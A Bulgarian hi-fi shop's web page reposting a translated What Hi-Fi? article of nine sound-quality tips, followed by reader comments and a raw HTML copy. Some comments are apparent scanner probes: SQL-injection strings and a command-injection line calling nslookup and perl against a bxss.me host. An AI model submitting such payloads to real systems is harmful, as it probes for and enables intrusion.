Свържете се с нас
0882 666660 

9 hi-fi трика, които влияят на качеството на звука.

17.02.2020 15:12:12

9 hi-fi трика, които влияят на качеството на звука.

С тази статия излагаме някои топ (ако не, то странни) хай-фи съвети и трикове.

(Снимка: www.shutterstock.com)

Има много лъжливи подмятания измежду поклонниците на хай-фи средите. От тези, които слушат само винил, до онези взискателните с позлатени кабели и слушащи само Pink Floyd. И въпреки това, някои от по-фантастичните теории, които може би сте чували, свързани с подобряването на звука на вашата система ... може и наистина да работят.

Да, ние отваряме кутията с червеи, която е хай-фи митовете, легенди, съвети и трикове, и поставяме What Hi-Fi? отметка за одобрение до някои предложения, които може би никога не сте чували или просто никога не сте вярвали. Повярвайте ни, слушането през нощта наистина може да направи музиката ви по-добра.

Ако не друго, внасянето на музика в домовете ни е изключително вълшебно. Трудно ни е да се сетим за едно житейско събитие, което не е било уникално заради звуците, които са го придружавали. Но сетивата ни очевидно са способни както да подпомонат за огромното богатство от емоции, така и направо да ни измамят. Следователно е безспорно, че опашката от истории около хай-фи звученето става все по-дълга с всяко завъртане на 180-грамова винилова плоча.

И така, от всички хай-фи паяжини, в които може би сте се вплели през годините, в какво всъщност трябва да вярвате? Прочетете нашето мнение към някои от популярните класики и не забравяйте да ги опитате, за да видите, дали можете да чуете разликата. В крайна сметка, от истинско значение е това, което чувате.

1. Разработване

(Снимка: www.lefflers.se)

Разработването е hi-fi 101. Това не е просто нещо, което правим, за да мине времето при преглед на продуктите - ние го правим, защото това наистина прави промяна. Цялото хай-фи оборудване, независимо дали става въпрос за слушалки, Bluetooth тонколони, CD плейъри, усилватели, грамофони или други компоненти, трябва да се разсвирва. Звукът се променя с течение на времето, когато компонентите слегнат, а драйверите и кросоувърът свикнат с техните операционни параметри. Обикновено около 48 часа непрекъснато свирене ще свърши работа, но може да отнеме дори повече дни, в зависимост от продукта. Това не е точна наука. Често сме променяли мнението си за даден продукт, след като сме го пуснали да си посвири през уикенда, преди да започнем същественото ни тестване. Повярвайте ни, не съдете по "студения" продукт.

2. Изключване на дисплея за по-добър звук

(Снимка: www.cambridgeaudionewsroom.com)

Добре, останете с нас, само на втора точка сме. Насочете вниманието си към вашата hi-fi система и вероятно се сещате за поне едно славно шаси (или колекция от шасита), съдържаща светкащи, цифрови дисплеи. Аудио фирмите са се погрижили да включат всичко от OLED с промяна на цвета до мини-LED дисплеи, в новите си шедьоври. След това са свели всичко до една приятна цена. И сега ви казваме да изключите целия дисплей?

Колкото и странно да изглежда, не е необичайно продуктите да звучат по-добре с изключени дисплеи. Защо? Защото тези светкащи дисплеи носят със себе си електрически шум. Знаем, че сте платили за този дисплей, но също така сте инвестирали в качеството на звука, което вашата система е в състояние да произвежда.

В тази връзка, може би дори по-малко очевиден е ефектът от изключването на цифровите изходи. Това не е обичайна черта - отличният CD6006 UK Edition на Marantz предлага тази функция - може да даде малко, но забележително подобрение на яснотата и динамиката. Това ще забележите само ако останалата част от системата ви е достатъчно ясна, но честна дума, това е хак, който върши работа при правилната настройка.

3. Слушане в тъмното.

(Снимка: www.eventbrite.com)

Има причина компании като Pitchblack Playback да провеждат събития, където хората слушат музика в тъмното. Слушането в пълен мрак (дори само със завързани очи, ако ви е по-удобно) ви позволява да се съсредоточите изцяло върху преживяването, като се "вглеждате" в повече звукови детайли, отколкото иначе.

Не ни вярвате? Е, нека включим тогава изказването на главния учен на Dolby - д-р Попи Крум, пред BBC през 2008 г .: „Това е изключително въздействащо. Има някои тънкости, които можете да чуете само когато ви се отнеме друго сетиво. Проблемът е, че мозъците ни са просто твърде добри, и затова когато зрението ни е в едно с другите ни сетива - не чуваме чистия звук. Вместо това, чуваме това, което мозъците ни смятат, че трябва да чуваме, след като подсъзнателно сме осмислили всичко останало около нас."

Преди да го отхърлите директно - приберете се у дома тази вечер, пуснете добре познат албум, затворете очи, изключете всички светлини и просто слушайте.

4. Слушане през нощта.

(Снимка: www.pexels.com)

Забелязвали ли сте някога, че по време на "вещерския" час - 3-4 часа сутринта (или дори малко по-късно през нощта) вашата hi-fi система звучи наистина добре? И забелязали ли сте, че просто не звучи толкова славно в късния следобед? Тази разлика, която чувате, не е само резултат от чашата вино, която сте изпили, а всъщност захранването ви е по-малко замърсено. Колкото повече електрически продукти се използват, толкова повече шум се добавя към електрическата мрежа и можете да чуете това като влошаване на качеството на звука от вашата система.

Има ли начин да получите този звук от вашата система, независимо от времето на деня? Е, можете да опитате с токов преобразувател за пречистване на захранването или да обиколите къщата и да изключите всичко свързано към електрическата мрежа, което не се използва. Също така, добре е да отделите специален бушон, само за вашата hi-fi система. И да, вероятно имате нужда от доста сериозна система, за да чуете съществена разлика - но бъдете сигурни, че зад този мит има някаква наука.

5. Топки за скуош между разделителите.

(Снимка: www.bikepacking.com)

Вероятно сте чували за това и преди (или поне сте прочели за него в някой хай-фи форум) - и това е вярно. Дори по-добре от половината на (или цяла) топка за скуош обаче е частично надута вътрешна гума от велосипед. Но нека караме по ред.

Основното тук е, че за да сведете до минимум количеството вибрации, с което системата ви трябва да се справя, е нужно да се уверите, че инсталирате компонентите си върху правилната основа. В идеалния случай това би било, специално проектиран за това, аудио рак/рафт. Идеалната основа е перфектно нивелирана, с нисък резонанс и поставена възможно най-далеч от източниците на вибрация.

Допълнителна точка е, че докато CD плейърите (например) не показват ефекта от вибрациите толкова очевидно, както, да речем, грамофона - прости неща като тежко стъпване, коли, свищящи покрай дома ви, самолети прелитащи отгоре, или дори звука от високоговорителите ви - особено при усилени нива - може да затрудни механизмите за четене на данни, което може да повлияе на звука, който получавате от вашата система.

Евтин експеримент, за да видите дали можете да "попиете" такива вибрации, е да поставите частично надута вътрешна гума от велосипед под плейъра и усилвателя си, и след това слушайте за каквато и да е разлика. Номерът тук е да оставите гумата възможно най-мека, докато същевременно все още повдига краката на системата от основната повърхност.

Може да е малко неудобно да постигнете иделана нивелация, но ако чуете подобрения, ще знаете, че е нещо, върху което си струва да помислите. Ако не чуете промяна, то тогава се надяваме, че поне сте се забавлявали малко в процеса (стига никой да не ви е гледал).

6. Не дръжте кабелите на пода.

(Снимка: www.russandrews.com)

Ние не предлагаме сложна настройка в стил д-р Сюс, включваща Котка в шапка, тичаща от стая в стая, докато държи кабелите ви във въздуха. Но като се замислите как кабелите могат да предават вибрации към вашата електроника, има смисъл да ги държите далеч от източниците на вибрации; собено от пода, когато става въпрос за кабелите на високоговорителите. Поради тази причина, може би сте виждали подобни измишльотини по време на хай-фи изложения, като това в Бристол, Вликобритания.

Не сте убедени? Помислете за това: компании като Naim включват вградени захранващи конектори във всичките си самостоятелни hi-fi компоненти точно по тази причина. Те са проектирани да сведат до минимум нежеланите вибрации, преди да влязат в продукта и да причинят неразбории. Следващия път, когато се насочите към вашия хай-фи дилър и включите някой скъп хай-фи сет, и усетите захранващото гнездо на устройството, като че ли, малко разхлабено, това не е защото е направено зле.

Очевидно, освен да не държите кабелите си по пода, трябва да се уверите, че те не са целите заплетени и с възли. Трябва да поддържате тяхната производителност (и цялостно състояние) в най-добрия възможен вид.

8. Кабели, като цяло.

(Снимка: www.audioquest.com)

Що се отнася до кабелите - има хора, които вярват, че всичко ще свърши работа и че харченето на допълнителни пари за кабели на високоговорителите и/или интерконектори е загуба. Всичко, което можем да ви кажем е, че разликите в производителността между определени кабели са ясни за нашите уши.

Почти всяко парче хай-фи компонент, което купите, ще се предлага с кабели в комплекта си. Най-добре е тези кабели да се считат за нищо повече от мярка за „начало“. Дори бюджетните компоненти ще звучат по-добре с някои по-добри интерконекти, така че е добра идея да уредите демонстрация и да включите в бюджета някои по-скъпи опции, в съответствие с цената на вашата система.

Това не означава, че като хвърлите повече пари за това, непременно ще получите по-добър звук - тези печалби в качеството отново ще зависят от възможностите на останалата част от вашата система. Но връзката между различните елементи на вашата система може доста да зависи от това, което ги свързва, както и способността на всеки компонент.

Както винаги, слухът е това, на което трябва да се доверите - ако не чуете разлика с по-скъпите кабели, тогава спестете парите си и продължете напред.

8. Класифициране на мощността при AV.

(Снимка: www.pexels.com)

За да спестим дългата история, натоварена с уравнения - направо ще кажем, че аудио/видео усилвателите рядко се тестват в рамките на същите стриктни параметри като hi-fi стерео усилвателите, когато става въпрос за изходна мощност.

Когато AV компании изброяват тези цифри, понякога правят няколко неща, за да манипулират числата. Например, често ще видите, че продуктът е свързан с натоварване от 4Ω или 6Ω за цитираната цифра на мощността, а не за стандартната 8Ω. Това всъщност ще позволи по-високо и сигурно измерване на изходната мощност. (Няма да ви отегчаваме с изчисленията, но това е вярно.)

Също така, рядко производителите ще дадат цифра за мощността на всички канали, задвижвани едновременно. Ако това стане, цифрата на мощността ще бъде доста по-впечатляваща, тъй като ще се разкрият всички ограничения на захранването на усилвателя.

AV светът е далеч по-малко строг по отношение на приемливи граници на изкривявания по време на тестването, често позволява до 1% изкривяване (срещу 0,01% в света на хай-фи), за да позволят по-съществени и по-желани числа за изходна мощност.

В крайна сметка, не отдавайте прекалено голямо значение на тези цифри.


9. Възпроизвеждане на компактдискове от самото начало

(Снимка: www.www.reddit.com)

И така, как едно CD звучи по-добре, ако го спрете и натиснете възпроизвеждане отначало, вместо да го възпроизвеждате от пауза? Защото, скъпи читатели, можем да ви уверим, че е така.

Не сме чули категорично обяснение. Въпреки това, от нашия опит да правим нещата по този начин, CD-компакт дисковете просто звучат малко по-добре.

Опитайте сами с любим албум на CD. Скоро ще видите, че не сме луди. Ние просто обичаме вътрешни гуми от велосипеди, малки стойки за нашите кабели, черни стаи и много, много късни нощи ...

И отново повтаряме: важното е какво чувате, така че ако не можете да чуете разликата, спестете си цял товар от проблеми и пари. Но ако все пак се намерите с известно свободно време, защо да не опитате някой от гореспоменатите трикове.

 

Източник: www.whathifi.com

Коментари

June Delas
June Delas 26.10.2021 Thank you for sharing this post. I hope you will share something more. https://www.electricianofasheville.com/
pHqghUme%' AND 2*3*8=6*8 AND 'zXoj'!='zXoj%
pHqghUme%' AND 2*3*8=6*8 AND 'zXoj'!='zXoj% 21.01.2021 555
-1 OR 2+22-22-1=0+0+0+1
-1 OR 2+22-22-1=0+0+0+1 21.01.2021 555
tN6h2jXt
tN6h2jXt 21.01.2021 555
pHqghUme' AND 2*3*8=6*8 AND '8ICO'='8ICO
pHqghUme' AND 2*3*8=6*8 AND '8ICO'='8ICO 21.01.2021 555
pHqghUme" AND 2*3*8=6*8 AND "Hpyz"="Hpyz
pHqghUme" AND 2*3*8=6*8 AND "Hpyz"="Hpyz 21.01.2021 555
(nslookup hitwmxhxzpyocc7ad8.bxss.me||perl -e "gethostbyname('hitwmxhxzpyocc7ad8.bxss.me')")
(nslookup hitwmxhxzpyocc7ad8.bxss.me||perl -e "gethostbyname('hitwmxhxzpyocc7ad8.bxss.me')") 21.01.2021 555
Slaveijelev.sj@gmail.com
[email protected] 22.10.2020 Важно е какво искаш и какво можеш
Tonchi
Tonchi 23.03.2020 "Забелязвали ли сте някога, че по време на "вещерския" час - 3-4 часа сутринта (или дори малко по-късно през нощта) вашата hi-fi система звучи наистина добре? И забелязали ли сте, че просто не звучи толкова славно в късния следобед? Тази разлика, която чувате, не е само резултат от чашата вино, която сте изпили, а всъщност захранването ви е по-малко замърсено. Колкото повече електрически продукти се използват, толкова повече шум се добавя към електрическата мрежа и можете да чуете това като влошаване на качеството на звука от вашата система." Дали да не прибавим, че в късните следобедни часове бръмчат прахосмукачки, ценрофуги, шумът от улицата, чалгата от комшиите, а през нощта всичко утихва и изпъква само музиката, която слушаме?

Остави коментар

Тестове

Тестове

9 hi-fi трика, които влияят на качеството на звука.

9 hi-fi трика, които влияят на качеството на звука.

С тази статия излагаме някои топ (ако не, то странни) хай-фи съвети и трикове.(Снимка: www.shutterstock.com)Има много лъжливи подмятания измежду поклонни С тази статия излагаме някои топ (ако не, то странни) хай-фи съвети и трикове.(Снимка: www.shutterstock.com)Има много лъжливи подмятания измежду поклонни 2020-03-05T10:26:09+02:00 9 hi-fi трика, които влияят на качеството на звука.

<p><em>С тази статия излагаме&nbsp;някои топ (ако не, то странни) хай-фи съвети и трикове.</em></p> <p><em><img class="aligncenter" src="https://cdncloudcart.com/14803/files/image/9.jpg" alt="" /></em><span style="font-size: 8pt;">(Снимка:&nbsp;<a href="https://www.shutterstock.com/">www.shutterstock.com</a>)</span></p> <p class="text-alignjustify">Има много лъжливи подмятания измежду поклонниците на хай-фи средите. От тези, които слушат само винил, до онези взискателните с позлатени кабели и слушащи само Pink Floyd. И въпреки това, някои от по-фантастичните теории, които може би сте чували, свързани с подобряването на звука на вашата система ... може и наистина да работят.</p> <p class="text-alignjustify">Да, ние отваряме кутията с червеи, която е хай-фи митовете, легенди, съвети и трикове, и поставяме <em>What Hi-Fi?</em>&nbsp;отметка за одобрение до някои предложения, които може би никога не сте чували или просто никога не сте вярвали. Повярвайте ни, слушането през нощта наистина може да направи музиката ви по-добра.</p> <p class="text-alignjustify">Ако не друго, внасянето на музика в домовете ни е изключително вълшебно. Трудно ни е да се сетим за едно житейско събитие, което не е било уникално заради звуците, които са го придружавали. Но сетивата ни очевидно са способни както да подпомонат за огромното богатство от емоции, така и направо да ни измамят. Следователно е безспорно, че опашката от истории около хай-фи звученето става все по-дълга с всяко завъртане на 180-грамова винилова плоча.</p> <p class="text-alignjustify">И така, от всички хай-фи паяжини, в които може би сте се вплели през годините, в какво всъщност трябва да вярвате? Прочетете нашето мнение към някои от популярните класики и не забравяйте да ги опитате, за да видите, дали можете да чуете разликата. В крайна сметка, от истинско значение е това, което чувате.</p> <p class="text-alignjustify"><span style="font-family: 'arial black', sans-serif; font-size: 12pt;">1. Разработване</span></p> <p><span style="font-family: 'arial black', sans-serif;"><img class="aligncenter" src="https://cdncloudcart.com/14803/files/image/700_marantz_mcr_612.jpg" alt="" /><span style="font-family: verdana, geneva, sans-serif; font-size: 8pt;">(Снимка: <a href="https://www.lefflers.se/">www.lefflers.se</a>)</span></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Разработването е hi-fi 101. Това не е просто нещо, което правим, за да мине времето при преглед на продуктите - ние го правим, защото това наистина прави промяна. Цялото хай-фи оборудване, независимо дали става въпрос за слушалки, Bluetooth тонколони, CD плейъри, усилватели, грамофони или други компоненти, трябва да се разсвирва. Звукът се променя с течение на времето, когато компонентите слегнат, а драйверите и кросоувърът свикнат с техните операционни параметри. Обикновено около 48 часа непрекъснато свирене ще свърши работа, но може да отнеме дори повече дни, в зависимост от продукта. Това не е точна наука. Често сме променяли мнението си за даден продукт, след като сме го пуснали да си посвири през уикенда, преди да започнем същественото ни тестване. Повярвайте ни, не съдете по "студения" продукт.</span></p> <p><span style="font-family: 'arial black', sans-serif; font-size: 12pt;">2. Изключване на дисплея за по-добър звук</span></p> <p><span style="font-family: 'arial black', sans-serif; font-size: 12pt;"><img class="aligncenter" src="https://cdncloudcart.com/14803/files/image/cxn_detail2_chromecast.jpg" alt="" /><span style="font-family: verdana, geneva, sans-serif; font-size: 8pt;">(Снимка: <a href="https://cambridgeaudionewsroom.com/">www.cambridgeaudionewsroom.com</a>)</span></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Добре, останете с нас, само на втора точка сме. Насочете вниманието си към вашата hi-fi система и вероятно се сещате за поне едно славно шаси (или колекция от шасита), съдържаща светкащи, цифрови дисплеи. Аудио фирмите са се погрижили да включат всичко от OLED с промяна на цвета до мини-LED дисплеи, в новите си шедьоври. След това са свели всичко до една приятна цена. И сега ви казваме да изключите целия дисплей?<br /></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Колкото и странно да изглежда, не е необичайно продуктите да звучат по-добре с изключени дисплеи. Защо? Защото тези светкащи дисплеи носят със себе си електрически шум. Знаем, че сте платили за този дисплей, но също така сте инвестирали в качеството на звука, което вашата система е в състояние да произвежда.<br /></span></p> <p class="text-alignjustify"><span style="font-family: 'arial black', sans-serif;"><span style="font-family: verdana, geneva, sans-serif;">В тази връзка, може би дори по-малко очевиден е ефектът от изключването на цифровите изходи. Това не е обичайна черта - отличният CD6006 UK Edition на Marantz предлага тази функция - може да даде малко, но забележително подобрение на яснотата и динамиката. Това ще забележите само ако останалата част от системата ви е достатъчно ясна, но честна дума, това е хак, който върши работа при правилната настройка.</span><br /></span></p> <p class="text-alignjustify"><span style="font-family: 'arial black', sans-serif; font-size: 12pt;">3.&nbsp;Слушане в тъмното.</span></p> <p><span style="font-family: 'arial black', sans-serif;"><span style="font-family: verdana, geneva, sans-serif;"><img class="aligncenter" src="https://cdncloudcart.com/14803/files/image/pitchblack-playback-credit-louise-bennett-2-2-1500x750.jpg" alt="" /><span style="font-size: 8pt;">(Снимка: <a href="https://www.eventbrite.com/">www.eventbrite.com</a>)</span></span></span></p> <p class="text-alignjustify"><span style="font-family: 'arial black', sans-serif;"><span style="font-family: verdana, geneva, sans-serif;">Има причина компании като <a href="http://www.pitchblackplayback.com/">Pitchblack Playback</a> да провеждат събития, където хората слушат музика в тъмното. Слушането в пълен мрак (дори само със завързани очи, ако ви е по-удобно) ви позволява да се съсредоточите изцяло върху преживяването, като се "вглеждате" в повече звукови детайли, отколкото иначе.<br /></span></span></p> <p class="text-alignjustify"><span style="font-family: 'arial black', sans-serif;"><span style="font-family: verdana, geneva, sans-serif;">Не ни вярвате? Е, нека включим тогава изказването на главния учен на Dolby - д-р Попи Крум, пред BBC през 2008 г .: &bdquo;Това е изключително въздействащо. Има някои тънкости, които можете да чуете само когато ви се отнеме друго сетиво. Проблемът е, че мозъците ни са просто твърде добри, и затова когато зрението ни е в едно с другите ни сетива - не чуваме чистия звук. Вместо това, чуваме това, което мозъците ни смятат, че трябва да чуваме, след като подсъзнателно сме осмислили всичко останало около нас."<br /></span></span></p> <p class="text-alignjustify"><span style="font-family: 'arial black', sans-serif;"><span style="font-family: verdana, geneva, sans-serif;">Преди да го отхърлите директно - приберете се у дома тази вечер, пуснете добре познат албум, затворете очи, изключете всички светлини и просто слушайте.<br /></span></span></p> <p><span style="font-family: verdana, geneva, sans-serif;"><span style="font-family: 'arial black', sans-serif; font-size: 12pt;">4. Слушане през нощта.</span><br /></span></p> <p><span style="font-family: verdana, geneva, sans-serif;"><span style="font-size: 8pt;"><img src="https://cdncloudcart.com/14803/files/image/.jpg" alt="" />(Снимка:<a href="https://www.pexels.com/"> www.pexels.com</a>)</span></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Забелязвали ли сте някога, че по време на "вещерския" час - 3-4 часа сутринта (или дори малко по-късно през нощта) вашата hi-fi система звучи наистина добре? И забелязали ли сте, че просто не звучи толкова славно в късния следобед? Тази разлика, която чувате, не е само резултат от чашата вино, която сте изпили, а всъщност захранването ви е по-малко замърсено. Колкото повече електрически продукти се използват, толкова повече шум се добавя към електрическата мрежа и можете да чуете това като влошаване на качеството на звука от вашата система.<br /></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Има ли начин да получите този звук от вашата система, независимо от времето на деня? Е, можете да опитате с токов преобразувател за пречистване на захранването или да обиколите къщата и да изключите всичко свързано към електрическата мрежа, което не се използва. Също така, добре е да отделите специален бушон, само за вашата hi-fi система. И да, вероятно имате нужда от доста сериозна система, за да чуете съществена разлика - но бъдете сигурни, че зад този мит има някаква наука.<br /></span></p> <p><span style="font-family: 'arial black', sans-serif; font-size: 12pt;">5. Топки за скуош между разделителите.</span></p> <p><span style="font-family: verdana, geneva, sans-serif;"><span style="font-size: 8pt;"><img src="https://cdncloudcart.com/14803/files/image/700c-to-650b_3-5e4a853e44d76.jpg" alt="" />(Снимка:&nbsp;<a href="https://bikepacking.com/">www.bikepacking.com</a>)</span></span></p> <p class="text-alignjustify">Вероятно сте чували за това и преди (или поне сте прочели за него в някой хай-фи форум) - и това е вярно. Дори по-добре от половината на (или цяла) топка за скуош обаче е частично надута вътрешна гума от велосипед. Но нека караме по ред.</p> <p class="text-alignjustify">Основното тук е, че за да сведете до минимум количеството вибрации, с което системата ви трябва да се справя, е нужно да се уверите, че инсталирате компонентите си върху правилната основа. В идеалния случай това би било, специално проектиран за това, аудио рак/рафт. Идеалната основа е перфектно нивелирана, с нисък резонанс и поставена възможно най-далеч от източниците на вибрация.</p> <p class="text-alignjustify">Допълнителна точка е, че докато CD плейърите (например) не показват ефекта от вибрациите толкова очевидно, както, да речем, грамофона - прости неща като тежко стъпване, коли, свищящи покрай дома ви, самолети прелитащи отгоре, или дори звука от високоговорителите ви - особено при усилени нива - може да затрудни механизмите за четене на данни, което може да повлияе на звука, който получавате от вашата система.</p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Евтин експеримент, за да видите дали можете да "попиете" такива вибрации, е да поставите частично надута вътрешна гума от велосипед под плейъра и усилвателя си, и след това слушайте за каквато и да е разлика. Номерът тук е да оставите гумата възможно най-мека, докато същевременно все още повдига краката на системата от основната повърхност.<br /></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Може да е малко неудобно да постигнете иделана нивелация, но ако чуете подобрения, ще знаете, че е нещо, върху което си струва да помислите. Ако не чуете промяна, то тогава се надяваме, че поне сте се забавлявали малко в процеса (стига никой да не ви е гледал).<br /></span></p> <p><span style="font-family: 'arial black', sans-serif; font-size: 12pt;">6. Не дръжте кабелите на пода.</span></p> <p><span style="font-family: verdana, geneva, sans-serif;"><img src="https://cdncloudcart.com/14803/files/image/efsrfgdfg.jpg" alt="" /><span style="font-size: 8pt;">(Снимка: <a href="https://www.russandrews.com/">www.russandrews.com</a>)</span><br /></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Ние не предлагаме сложна настройка в стил д-р Сюс, включваща Котка в шапка, тичаща от стая в стая, докато държи кабелите ви във въздуха. Но като се замислите как кабелите могат да предават вибрации към вашата електроника, има смисъл да ги държите далеч от източниците на вибрации; собено от пода, когато става въпрос за кабелите на високоговорителите. Поради тази причина, може би сте виждали подобни измишльотини по време на хай-фи изложения, като това в Бристол, Вликобритания.<br /></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Не сте убедени? Помислете за това: компании като Naim включват вградени захранващи конектори във всичките си самостоятелни hi-fi компоненти точно по тази причина. Те са проектирани да сведат до минимум нежеланите вибрации, преди да влязат в продукта и да причинят неразбории. Следващия път, когато се насочите към вашия хай-фи дилър и включите някой скъп хай-фи сет, и усетите захранващото гнездо на устройството, като че ли, малко разхлабено, това не е защото е направено зле.<br /></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Очевидно, освен да не държите кабелите си по пода, трябва да се уверите, че те не са целите заплетени и с възли. Трябва да поддържате тяхната производителност (и цялостно състояние) в най-добрия възможен вид.<br /></span></p> <p class="text-alignjustify"><span style="font-family: 'arial black', sans-serif; font-size: 12pt;">8.&nbsp;Кабели, като цяло.</span></p> <p><span style="font-family: verdana, geneva, sans-serif;"><img class="aligncenter" src="https://cdncloudcart.com/14803/files/image/jq7gdsmrdgstbnlbly6u2h-970-80.jpg" alt="" /><span style="font-size: 8pt;">(Снимка: <a href="https://www.audioquest.com/">www.audioquest.com</a>)</span></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Що се отнася до кабелите - има хора, които вярват, че всичко ще свърши работа и че харченето на допълнителни пари за кабели на високоговорителите и/или интерконектори е загуба. Всичко, което можем да ви кажем е, че разликите в производителността между определени кабели са ясни за нашите уши.<br /></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Почти всяко парче хай-фи компонент, което купите, ще се предлага с кабели в комплекта си. Най-добре е тези кабели да се считат за нищо повече от мярка за &bdquo;начало&ldquo;. Дори бюджетните компоненти ще звучат по-добре с някои по-добри интерконекти, така че е добра идея да уредите демонстрация и да включите в бюджета някои по-скъпи опции, в съответствие с цената на вашата система.<br /></span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Това не означава, че като хвърлите повече пари за това, непременно ще получите по-добър звук - тези печалби в качеството отново ще зависят от възможностите на останалата част от вашата система. Но връзката между различните елементи на вашата система може доста да зависи от това, което ги свързва, както и способността на всеки компонент.</span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">Както винаги, слухът е това, на което трябва да се доверите - ако не чуете разлика с по-скъпите кабели, тогава спестете парите си и продължете напред.<br /></span></p> <p class="text-alignjustify"><span style="font-family: 'arial black', sans-serif; font-size: 12pt;">8. Класифициране на мощността при AV.</span></p> <p><img class="aligncenter" src="https://cdncloudcart.com/14803/files/image/-5e4a9ca86a1f7.jpg" alt="" /><span style="font-size: 8pt;">(Снимка:<a href="https://www.pexels.com/"> www.pexels.com</a>)</span></p> <p class="text-alignjustify"><span style="font-family: verdana, geneva, sans-serif;">За да спестим дългата история, натоварена с уравнения - направо ще кажем, че аудио/видео усилвателите рядко се тестват в рамките на същите стриктни параметри като hi-fi стерео усилвателите, когато става въпрос за изходна мощност.<br /></span></p> <p class="text-alignjustify">Когато AV компании изброяват тези цифри, понякога правят няколко неща, за да манипулират числата. Например, често ще видите, че продуктът е свързан с натоварване от 4&Omega; или 6&Omega; за цитираната цифра на мощността, а не за стандартната 8&Omega;. Това всъщност ще позволи по-високо и сигурно измерване на изходната мощност. (Няма да ви отегчаваме с изчисленията, но това е вярно.)</p> <p class="text-alignjustify">Също така, рядко производителите ще дадат цифра за мощността на всички канали, задвижвани едновременно. Ако това стане, цифрата на мощността ще бъде доста по-впечатляваща, тъй като ще се разкрият всички ограничения на захранването на усилвателя.</p> <p class="text-alignjustify">AV светът е далеч по-малко строг по отношение на приемливи граници на изкривявания по време на тестването, често позволява до 1% изкривяване (срещу 0,01% в света на хай-фи), за да позволят по-съществени и по-желани числа за изходна мощност.</p> <p class="text-alignjustify">В крайна сметка, не отдавайте прекалено голямо значение на тези цифри.</p> <p class="text-alignjustify"><br />9. Възпроизвеждане на компактдискове от самото начало</p> <p><img class="aligncenter" src="https://cdncloudcart.com/14803/files/image/yjtutfgk.jpg" alt="" /><span style="font-size: 8pt;">(Снимка: <a href="https://www.reddit.com/">www.www.reddit.com</a>)</span></p> <p class="text-alignjustify">И така, как едно CD звучи по-добре, ако го спрете и натиснете възпроизвеждане отначало, вместо да го възпроизвеждате от пауза? Защото, скъпи читатели, можем да ви уверим, че е така.</p> <p class="text-alignjustify">Не сме чули категорично обяснение. Въпреки това, от нашия опит да правим нещата по този начин, CD-компакт дисковете просто звучат малко по-добре.</p> <p class="text-alignjustify">Опитайте сами с любим албум на CD. Скоро ще видите, че не сме луди. Ние просто обичаме вътрешни гуми от велосипеди, малки стойки за нашите кабели, черни стаи и много, много късни нощи ...</p> <p class="text-alignjustify">И отново повтаряме: важното е какво чувате, така че ако не можете да чуете разликата, спестете си цял товар от проблеми и пари. Но ако все пак се намерите с известно свободно време, защо да не опитате някой от гореспоменатите трикове.</p> <p>&nbsp;</p> <p><span style="font-size: 10pt;">Източник:&nbsp;<a href="https://www.whathifi.com/features/hi-fi-tricks-you-might-not-believe-affect-sound-quality-but-they-do">www.whathifi.com</a></span></p> <p><iframe style="border: none; overflow: hidden;" src="https://www.facebook.com/plugins/share_button.php?href=https%3A%2F%2Fkirov-high-end.bg%2Farticle%2F9-hi-fi-trika-koito-vliyayat-na-kachestvoto-na-zvuka&amp;layout=button_count&amp;size=large&amp;width=88&amp;height=28&amp;appId" width="88" height="28" frameborder="0" scrolling="no"></iframe></p>

June Delas June Delas

2021-10-26T08:05:46+03:00
Thank you for sharing this post. I hope you will share something more. https://www.electricianofasheville.com/

pHqghUme%' AND 2*3*8=6*8 AND 'zXoj'!='zXoj% pHqghUme%' AND 2*3*8=6*8 AND 'zXoj'!='zXoj%

2021-01-21T22:35:24+02:00
555

-1 OR 2+22-22-1=0+0+0+1 -1 OR 2+22-22-1=0+0+0+1

2021-01-21T22:35:24+02:00
555

tN6h2jXt tN6h2jXt

2021-01-21T22:35:23+02:00
555

pHqghUme' AND 2*3*8=6*8 AND '8ICO'='8ICO pHqghUme' AND 2*3*8=6*8 AND '8ICO'='8ICO

2021-01-21T22:35:23+02:00
555

pHqghUme" AND 2*3*8=6*8 AND "Hpyz"="Hpyz pHqghUme" AND 2*3*8=6*8 AND "Hpyz"="Hpyz

2021-01-21T22:35:23+02:00
555

(nslookup hitwmxhxzpyocc7ad8.bxss.me||perl -e "gethostbyname('hitwmxhxzpyocc7ad8.bxss.me')") (nslookup hitwmxhxzpyocc7ad8.bxss.me||perl -e "gethostbyname('hitwmxhxzpyocc7ad8.bxss.me')")

2021-01-21T22:34:19+02:00
555

[email protected] Slaveijelev.sj@gmail.com

2020-10-22T17:42:12+03:00
Важно е какво искаш и какво можеш

Tonchi Tonchi

2020-03-23T18:27:10+02:00
"Забелязвали ли сте някога, че по време на "вещерския" час - 3-4 часа сутринта (или дори малко по-късно през нощта) вашата hi-fi система звучи наистина добре? И забелязали ли сте, че просто не звучи толкова славно в късния следобед? Тази разлика, която чувате, не е само резултат от чашата вино, която сте изпили, а всъщност захранването ви е по-малко замърсено. Колкото повече електрически продукти се използват, толкова повече шум се добавя към електрическата мрежа и можете да чуете това като влошаване на качеството на звука от вашата система." Дали да не прибавим, че в късните следобедни часове бръмчат прахосмукачки, ценрофуги, шумът от улицата, чалгата от комшиите, а през нощта всичко утихва и изпъква само музиката, която слушаме?
Сравнение на продукти